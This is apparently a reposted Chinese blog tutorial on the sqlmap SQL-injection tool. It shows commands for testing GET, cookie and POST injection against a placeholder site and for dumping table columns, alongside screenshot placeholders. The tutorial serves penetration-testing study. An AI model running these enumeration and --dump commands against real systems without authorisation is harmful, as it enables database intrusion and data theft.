zoukankan      html  css  js  c++  java
  • Sqlmap注入工具使用

    2019年12月17日 星期一 CQCET
    Sqlmap介绍:
    Sqlmap是一款自动注入工具,kali,bt内置了该软件(windows可在官网下载),sqlmap是由python开发,开源软件,相比啊d,民小子,御剑之类的注入工具,sqlmap更加强大,它自带字典,可在多平台运行,可以进行mysql,access,mssql等数据库的注入。

    访问一个网站,检查是否存在get注入漏洞:
    在这里插入图片描述

    命令:
    Sql -u ‘xxx.com’
    -u 检查是否存在get注入
    在这里插入图片描述
    返回值得到可以注入,注入类型为get盲注,及系统,数据库信息。

    判断url是否存在cookie注入
    命令:
    Sqlmap -u ‘xxx.com’ --cookie ‘id=xx’ --level 2
    测试结果

    在这里插入图片描述

    判断url是否存在post注入
    命令:sqlmap -u ‘xxx.com’ --data ‘key=value&xx=xx’

    测试结果是失败的
    在这里插入图片描述
    Sqlmap -u ‘xxx.com’ -D xx(数据库名)-T xx (列名) --columns [获取表内列信息]

    在这里插入图片描述

    Sqlmap -u ‘xxx.com’ -D xx (数据库名) -T xx (表名) -C xx,xx (列名) --dump [根据库,表,拆xx,xx列中的数据]
    在这里插入图片描述
    在这里插入图片描述

  • 相关阅读:
    移动端调试Vconsole
    Vue-返回顶部
    Vue-封装loading
    Vue-水印封装
    Vue-封装scroll触底
    微信小程序-图片上传
    前端面试题(2)
    前端常见面试题
    服务端渲染(SSR)和客户端(CSR)渲染的区别
    什么是模块化?模块化开发的好处
  • 原文地址:https://www.cnblogs.com/cqnswp/p/12568874.html
Copyright © 2011-2022 走看看